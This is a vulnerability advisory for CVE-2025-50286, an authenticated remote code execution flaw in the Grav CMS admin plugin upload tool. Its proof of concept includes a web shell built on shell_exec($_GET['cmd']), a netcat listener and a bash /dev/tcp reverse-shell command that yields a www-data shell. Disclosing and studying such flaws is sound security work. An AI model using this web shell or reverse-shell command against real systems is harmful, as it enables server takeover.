### Critical Vulnerability Information #### Vulnerability Overview - **CVE ID**: CVE-2025-50286 - **Type**: Authenticated Remote Code Execution (RCE) - **Location**: /admin/tools/direct-install (Admin Panel > Tools > Direct Install) - **Impact**: Arbitrary PHP code execution and potential full system compromise - **Authentication Required**: Yes (Administrator access) - **Affected Versions**: Grav CMS v1.7.48 / Admin Plugin v1.10.48 #### Proof of Concept (PoC) 1. Set up listener: `nc -lvp 4444` 2. Log in to Grav admin panel as administrator. 3. Navigate to Tools > Direct Install. 4. Upload malicious plugin ZIP (`evilplugin.zip`) with the following structure: ``` evil/plugin/ └── evilplugin.php # Contains shell_exec($_GET['cmd']) └── blueprints.yaml # Minimal blueprint to pass validation ``` 5. Trigger reverse shell: `curl --get --data-urlencode "cmd=bash -c 'bash -i >& /dev/tcp/host.docker.internal/4444 0>&1'" ` 6. Receive reverse shell: ``` $ nc -lvp 4444 Listening on 0.0.0.0 4444 Connection received on www-data@target:/var/www/html$ whoami www-data ``` #### Affected Components - **Endpoint**: /admin/tools/direct-install - **Functionality**: Plugin upload and auto-load without validation #### Test Environment - Debian 11 - Apache2 + PHP 7.4 - Grav CMS v1.7.48 (with Admin Plugin v1.10.48) #### Discoverer - @binneko #### References - [Grav CMS Github](https://github.com/getgrav/grav) - [CVE Record - CVE-2025-50286](https://nvd.nist.gov/vuln/detail/CVE-2025-50286)